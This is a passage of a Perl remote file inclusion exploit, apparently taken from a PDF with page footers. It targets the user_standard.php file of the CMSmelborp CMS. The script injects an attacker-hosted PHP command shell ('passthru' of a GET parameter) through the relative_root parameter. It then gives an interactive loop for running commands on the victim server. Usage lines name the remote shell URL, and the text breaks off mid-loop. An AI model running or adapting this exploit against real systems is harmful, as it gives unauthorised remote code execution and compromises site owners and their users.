1 #!/usr/bin/perl
2 ##
3 # Portal Name : CMSmelborp(user_standard.php) Remote File Inclusion Exploit
4 # Bug Found DeltahackingSecurityTEAM Code :Dr.Trojan&Dr.Pantagon
5 ##
6 # Download =http://superb−west.dl.sourceforge.net/sourceforge/cmsmelborp/CMSmelborp.zip
7 #
8 ##
9 # usage:
10 # perl CMSmelborp.pl <target> <cmd shell location> <cmd shell variable>
11 #
12 # perl CMSmelborp.pl http://[target]/[path]/includes http://site.com/cmd.txt cmd
13 #
14 # cmd shell example: <?passthru($_GET[cmd]);?>
15 #
16 # cmd shell variable: ($_GET[cmd]);
17 ##
18 # #
19 #Greetz: Dr.Trojan , Hiv++ , D_7j ,Vpc,Str0ke
20 #
21 # Contact:dr.trojan@deltahacking.net
22 ##
23 # Web Site:www.deltahacking.net(private)&www.deltahacking.ir(Puplic)
24 # exploit: http://site.com/includes/user_standard.php?relative_root=http://yourshell/shell.txt?&
25 ##
26
27 use LWP::UserAgent;
28 $Path = $ARGV[0];
29 $Pathtocmd = $ARGV[1];
30 $cmdv = $ARGV[2];
31 if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
32 head();
33 while()
34 {
35 print "[shell] \__DOCTEXT__quot;;
36 while(<STDIN>)
37 {
38 $cmd=$_;
39 chomp($cmd);
40 $xpl = LWP::UserAgent−>new() or die;
41 $req = HTTP::Request−>new(GET =>$Path.’includes/user_standard.php?relative_root=’.$Pathtocmd.’?&’.$cmdv.’=’.$cmd)or die "\nCould Not
connect\n";
42 $res = $xpl−>request($req);
43 $return = $res−>content;
44 $return =~ tr/[\n]/[.......]/;
45 if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
46 elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/
)
47 {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
48 elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
49 if($return =~ /(.*)/)
50
Page 1/2
CMSmelborp Beta user_standard.php Remote File Include Exploit
DeltahackingTEAM
11/12/2006
51 {
52 $finreturn = $1;
53 $finreturn=~ tr/[.......]/[\n]/;
54 print "\r\n$finreturn\n\r";
55